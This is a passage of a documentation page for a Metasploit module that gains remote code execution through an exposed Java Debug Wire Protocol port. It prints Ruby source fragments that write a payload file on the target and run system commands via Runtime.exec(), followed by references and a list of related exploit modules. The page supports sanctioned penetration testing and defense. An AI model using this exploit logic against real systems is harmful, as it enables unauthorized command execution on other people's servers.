742: fail_with(Failure::Unknown, "Failed to create byte array to store payload") if pl.nil? || (pl == 0)
743:
744: set_values(pl, pl_exe.bytes)
Failed to create byte array to store payload
Here is a relevant code snippet related to the "Failed to create byte array to store payload" error message:
737:
738: buf = create_array(pl_exe.length)
739: fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected Array") unless buf[0] == [TAG_ARRAY].pack('C')
740:
741: pl = unformat(size, buf[1..1+size-1])
742: fail_with(Failure::Unknown, "Failed to create byte array to store payload") if pl.nil? || (pl == 0)
743:
744: set_values(pl, pl_exe.bytes)
745: pl
746: end
747:
Exception while writing to file
Here is a relevant code snippet related to the "Exception while writing to file" error message:
752: data << format(size, pl)
753: data_array = [data]
754: runtime_class , runtime_meth = get_class_and_method("Ljava/io/FileOutputStream;", "write", "([B)V")
755: buf = invoke(file, thread_id, runtime_class["reftype_id"], runtime_meth["method_id"], data_array)
756: unless buf[0] == [TAG_VOID].pack('C')
757: fail_with(Failure::Unknown, "Exception while writing to file")
758: end
759: end
760:
761: # Closes a file on the server given a execution thread
762: def close_file(thread_id, file)
Exception while closing file
Here is a relevant code snippet related to the "Exception while closing file" error message:
761: # Closes a file on the server given a execution thread
762: def close_file(thread_id, file)
763: runtime_class , runtime_meth = get_class_and_method("Ljava/io/FileOutputStream;", "close")
764: buf = invoke(file, thread_id, runtime_class["reftype_id"], runtime_meth["method_id"])
765: unless buf[0] == [TAG_VOID].pack('C')
766: fail_with(Failure::Unknown, "Exception while closing file")
767: end
768: end
769:
770: # Executes a system command on target VM making use of java.lang.Runtime.exec()
771: def execute_command(thread_id, cmd)
Failed to allocate string for payload dumping
Here is a relevant code snippet related to the "Failed to allocate string for payload dumping" error message:
772: size = @vars["objectid_size"]
773:
774: # 1. Creates a string on target VM with the command to be executed
775: cmd_obj_ids = create_string(cmd)
776: if cmd_obj_ids.length == 0
777: fail_with(Failure::Unknown, "Failed to allocate string for payload dumping")
778: end
779:
780: cmd_obj_id = cmd_obj_ids[0]["obj_id"]
781:
782: # 2. Gets Runtime context
Unexpected returned type: expected Object
Here is a relevant code snippet related to the "Unexpected returned type: expected Object" error message:
781:
782: # 2. Gets Runtime context
783: runtime_class , runtime_meth = get_class_and_method("Ljava/lang/Runtime;", "getRuntime")
784: buf = invoke_static(runtime_class["reftype_id"], thread_id, runtime_meth["method_id"])
785: unless buf[0] == [TAG_OBJECT].pack('C')
786: fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected Object")
787: end
788:
789: rt = unformat(size, buf[1..1+size-1])
790: if rt.nil? || (rt == 0)
791: fail_with(Failure::Unknown, "Failed to invoke Runtime.getRuntime()")
Failed to invoke Runtime.getRuntime()
Here is a relevant code snippet related to the "Failed to invoke Runtime.getRuntime()" error message:
786: fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected Object")
787: end
788:
789: rt = unformat(size, buf[1..1+size-1])
790: if rt.nil? || (rt == 0)
791: fail_with(Failure::Unknown, "Failed to invoke Runtime.getRuntime()")
792: end
793:
794: # 3. Finds and executes "exec" method supplying the string with the command
795: exec_meth = get_method_by_name(runtime_class["reftype_id"], "exec")
796: if exec_meth.nil?
Cannot find method Runtime.exec()
Here is a relevant code snippet related to the "Cannot find method Runtime.exec()" error message:
792: end
793:
794: # 3. Finds and executes "exec" method supplying the string with the command
795: exec_meth = get_method_by_name(runtime_class["reftype_id"], "exec")
796: if exec_meth.nil?
797: fail_with(Failure::BadConfig, "Cannot find method Runtime.exec()")
798: end
799:
800: data = [TAG_OBJECT].pack('C')
801: data << format(size, cmd_obj_id)
802: data_array = [data]
Unexpected returned type: expected Object
Here is a relevant code snippet related to the "Unexpected returned type: expected Object" error message:
800: data = [TAG_OBJECT].pack('C')
801: data << format(size, cmd_obj_id)
802: data_array = [data]
803: buf = invoke(rt, thread_id, runtime_class["reftype_id"], exec_meth["method_id"], data_array)
804: unless buf[0] == [TAG_OBJECT].pack('C')
805: fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected Object")
806: end
807: end
808:
809: # Set event for stepping into a running thread
810: def set_step_event
Could not find a suitable thread for stepping
Here is a relevant code snippet related to the "Could not find a suitable thread for stepping" error message:
814: if thread_status(thread) == THREAD_SLEEPING_STATUS
815: t_id = thread
816: break
817: end
818: end
819: fail_with(Failure::Unknown, "Could not find a suitable thread for stepping") if t_id.nil?
820:
821: # 2. Suspend the VM before setting the event
822: suspend_vm
823:
824: vprint_status("Setting 'step into' event in thread: #{t_id}")
Could not set the event
Here is a relevant code snippet related to the "Could not set the event" error message:
827: step_info << [STEP_INTO].pack('N')
828: data = [[MODKIND_STEP, step_info]]
829:
830: r_id = send_event(EVENT_STEP, data)
831: unless r_id
832: fail_with(Failure::Unknown, "Could not set the event")
833: end
834:
835: return r_id, t_id
836: end
837:
Security attribute not found
Here is a relevant code snippet related to the "Security attribute not found" error message:
845:
846: fields.each do |field|
847: sec_field = field["field_id"] if field["name"].downcase == "security"
848: end
849:
850: fail_with(Failure::Unknown, "Security attribute not found") if sec_field.nil?
851:
852: value = get_value(sys_class["reftype_id"], sec_field)
853:
854: if(value == 0)
855: print_good("Security manager was not set")
JDWP Protocol not found
Here is a relevant code snippet related to the "JDWP Protocol not found" error message:
906: @os = nil
907:
908: connect
909:
910: unless handshake == HANDSHAKE
911: fail_with(Failure::NotVulnerable, "JDWP Protocol not found")
912: end
913:
914: print_status("Retrieving the sizes of variable sized data types in the target VM...")
915: get_sizes
916:
Received <VALUE> responses that are not a 'step into' event...
Here is a relevant code snippet related to the "Received <VALUE> responses that are not a 'step into' event..." error message:
929: print_status("Resuming VM and waiting for an event...")
930: response = resume_vm
931:
932: unless parse_event(response, r_id, t_id)
933: datastore['NUM_RETRIES'].times do |i|
934: print_status("Received #{i + 1} responses that are not a 'step into' event...")
935: buf = read_reply
936: break if parse_event(buf, r_id, t_id)
937:
938: if i == datastore['NUM_RETRIES']
939: fail_with(Failure::Unknown, "Event not received in #{datastore['NUM_RETRIES']} attempts")
Event not received in <NUM_RETRIES> attempts
Here is a relevant code snippet related to the "Event not received in <NUM_RETRIES> attempts" error message:
934: print_status("Received #{i + 1} responses that are not a 'step into' event...")
935: buf = read_reply
936: break if parse_event(buf, r_id, t_id)
937:
938: if i == datastore['NUM_RETRIES']
939: fail_with(Failure::Unknown, "Event not received in #{datastore['NUM_RETRIES']} attempts")
940: end
941: end
942: end
943:
944: vprint_status("Received matching event from thread #{t_id}")
Go back to menu.
Related Pull Requests
- #10649 Merged Pull Request: Fix http://seclists.org links to https://
- #8871 Merged Pull Request: removing slice operators from jdwp_debugger
- #8338 Merged Pull Request: Fix msf/core and self.class msftidy warnings
- #7862 Merged Pull Request: Ruby 2.4 local fixes for metasploit-framework
- #6812 Merged Pull Request: Resolve #6807, remove all OSVDB references.
- #6655 Merged Pull Request: use MetasploitModule as a class name
- #6648 Merged Pull Request: Change metasploit class names
- #6526 Merged Pull Request: Peers for the peer god
- #5348 Merged Pull Request: Feature/msp 12358/ntds dump module
- #5276 Merged Pull Request: Fix and improve JDWP
- #5173 Merged Pull Request: fix fail_with errors
- #3407 Merged Pull Request: Add JDWP RCE for Windows and Linux
References
- CVE: Not available
- OSVDB (96066)
- EDB-27179
- http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp-spec.html
- https://seclists.org/nmap-dev/2010/q1/867
- https://github.com/schierlm/JavaPayload/blob/master/JavaPayload/src/javapayload/builder/JDWPInjector.java
- https://svn.nmap.org/nmap/scripts/jdwp-exec.nse
- http://blog.ioactive.com/2014/04/hacking-java-debug-wire-protocol-or-how.html
See Also
Check also the following modules related to this module:
- exploit/multi/misc/java_jmx_server
- exploit/multi/misc/java_rmi_server
- exploit/multi/browser/java_atomicreferencearray
- exploit/multi/browser/java_calendar_deserialize
- exploit/multi/browser/java_getsoundbank_bof
- exploit/multi/browser/java_jre17_driver_manager
- exploit/multi/browser/java_jre17_exec
- exploit/multi/browser/java_jre17_glassfish_averagerangestatisticimpl
- exploit/multi/browser/java_jre17_jaxws
- exploit/multi/browser/java_jre17_jmxbean
- exploit/multi/browser/java_jre17_jmxbean_2
- exploit/multi/browser/java_jre17_method_handle
- exploit/multi/browser/java_jre17_provider_skeleton
- exploit/multi/browser/java_jre17_reflection_types
- exploit/multi/browser/java_rhino
- exploit/multi/browser/java_rmi_connection_impl
- exploit/multi/browser/java_setdifficm_bof
- exploit/multi/browser/java_signed_applet
- exploit/multi/browser/java_storeimagearray
- exploit/multi/browser/java_trusted_chain
- exploit/multi/browser/java_verifier_field_access
- auxiliary/admin/zend/java_bridge
- auxiliary/gather/java_rmi_registry
- auxiliary/scanner/misc/java_jmx_server
- auxiliary/scanner/misc/java_rmi_server
- exploit/windows/browser/java_basicservice_impl
- exploit/windows/browser/java_cmm
- exploit/windows/browser/java_codebase_trust
- exploit/windows/browser/java_docbase_bof
- exploit/windows/browser/java_mixer_sequencer
- exploit/windows/browser/java_ws_arginject_altjvm
- exploit/windows/browser/java_ws_double_quote
- exploit/windows/browser/java_ws_vmargs
- exploit/multi/misc/batik_svg_java
- exploit/multi/misc/zend_java_bridge
Authors
- Michael Schierl
- Christophe Alladoum
- Redsadic <julian.vilas[at]gmail.com>
Version
This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.